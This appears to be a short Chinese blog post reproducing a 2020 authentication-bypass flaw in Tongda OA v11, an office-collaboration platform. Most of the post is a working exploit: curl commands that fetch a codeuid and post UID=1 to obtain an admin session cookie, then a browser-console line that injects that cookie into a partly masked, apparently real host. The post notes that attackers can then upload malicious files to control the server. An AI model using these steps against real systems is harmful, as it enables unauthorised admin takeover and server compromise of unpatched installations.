2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。通达OA是通达信科打造的协同办公平台,涵盖了工作流程、电子邮件、即时通讯、公告通知、新闻、日程安排、工作日志、知识管理,等近300个功能模块,国内用户众多。

1.访问 /general/login_code.php 获取 codeuid

curl -v http://***.vsgo.cloud/general/login_code.php

2.用 codeuid 请求 /logincheck_code.php,获取cookie

curl -v -d 'CODEUID=2AF415ED-E5A7-109A-4020-31B9D06ADD3A&UID=1' http://***.vsgo.cloud/logincheck_code.php

3.浏览器中打开 http://***.vsgo.cloud/general/ ,并在浏览器控制台上执行:

document.cookie="PHPSESSID=67b0bacb8dd8e730c8b0f81303b1513a;"

4.刷新页面,成功登录后台

参考:
通达OA任意用户伪造登录漏洞分析与复现
通达OA前台任意用户登录漏洞复现
通达OA 前台任意用户登录漏洞复现(更新手工获取cookie过程)
通达OA前台任意伪造用户登录审计和复现